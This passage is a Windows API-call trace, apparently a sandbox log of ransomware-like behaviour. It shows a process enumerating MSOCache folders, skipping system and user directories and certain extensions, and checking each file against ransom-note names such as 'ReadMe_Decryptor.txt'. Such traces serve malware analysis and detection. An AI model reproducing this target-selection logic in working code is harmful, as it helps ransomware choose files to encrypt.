(lpString="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 40 [0106.770] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.770] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.771] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0106.771] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\" [0106.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\") returned 63 [0106.771] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0106.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.845] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.849] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.849] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0106.849] lstrcmpW (lpString1="ExcelLR.cab", lpString2=".") returned 1 [0106.849] lstrcmpW (lpString1="ExcelLR.cab", lpString2="..") returned 1 [0106.849] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.849] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0106.849] PathFindExtensionW (pszPath="ExcelLR.cab") returned=".cab" [0106.849] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0106.849] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0106.849] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0106.849] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0106.849] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0106.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3650 [0106.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.850] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0106.850] lstrcmpW (lpString1="ExcelMUI.msi", lpString2=".") returned 1 [0106.850] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="..") returned 1 [0106.850] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.850] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0106.850] PathFindExtensionW (pszPath="ExcelMUI.msi") returned=".msi" [0106.850] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0106.850] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0106.850] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0106.850] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0106.850] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0106.850] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0106.850] lstrcmpW (lpString1="ExcelMUI.xml", lpString2=".") returned 1 [0106.850] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="..") returned 1 [0106.850] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.850] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0106.850] PathFindExtensionW (pszPath="ExcelMUI.xml") returned=".xml" [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0106.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a36f8 [0106.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.851] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0106.851] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0106.851] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0106.851] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0106.851] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0106.851] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0106.851] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0106.852] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0106.852] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0106.852] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0106.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a37a0 [0106.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.852] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0106.852] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0106.852] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0106.852] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0106.852] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0106.852] lstrlenW (lpString="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 40 [0106.852] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0106.853] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.854] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0106.854] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0106.854] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned 63 [0106.854] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0106.908] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.908] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.910] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.910] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.910] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0106.910] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2=".") returned 1 [0106.910] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="..") returned 1 [0106.910] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.910] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0106.911] PathFindExtensionW (pszPath="PowerPointMUI.msi") returned=".msi" [0106.911] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0106.911] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0106.911] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0106.911] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0106.911] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0106.911] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0106.911] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2=".") returned 1 [0106.911] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="..") returned 1 [0106.911] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.911] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0106.911] PathFindExtensionW (pszPath="PowerPointMUI.xml") returned=".xml" [0106.911] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0106.911] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0106.911] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0106.911] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0106.911] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0106.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9cc0 [0106.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.911] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0106.911] lstrcmpW (lpString1="PptLR.cab", lpString2=".") returned 1 [0106.912] lstrcmpW (lpString1="PptLR.cab", lpString2="..") returned 1 [0106.912] lstrcmpiW (lpString1="PptLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.912] lstrcmpiW (lpString1="PptLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0106.912] PathFindExtensionW (pszPath="PptLR.cab") returned=".cab" [0106.912] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0106.912] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0106.912] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0106.912] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0106.912] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0106.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3848 [0106.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.912] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0106.912] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0106.912] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0106.912] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0106.912] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0106.912] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0106.912] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0106.913] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0106.913] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0106.913] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0106.913] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0106.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a38f0 [0106.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.913] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0106.913] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0106.917] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0106.917] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0106.917] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0106.917] lstrlenW (lpString="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 40 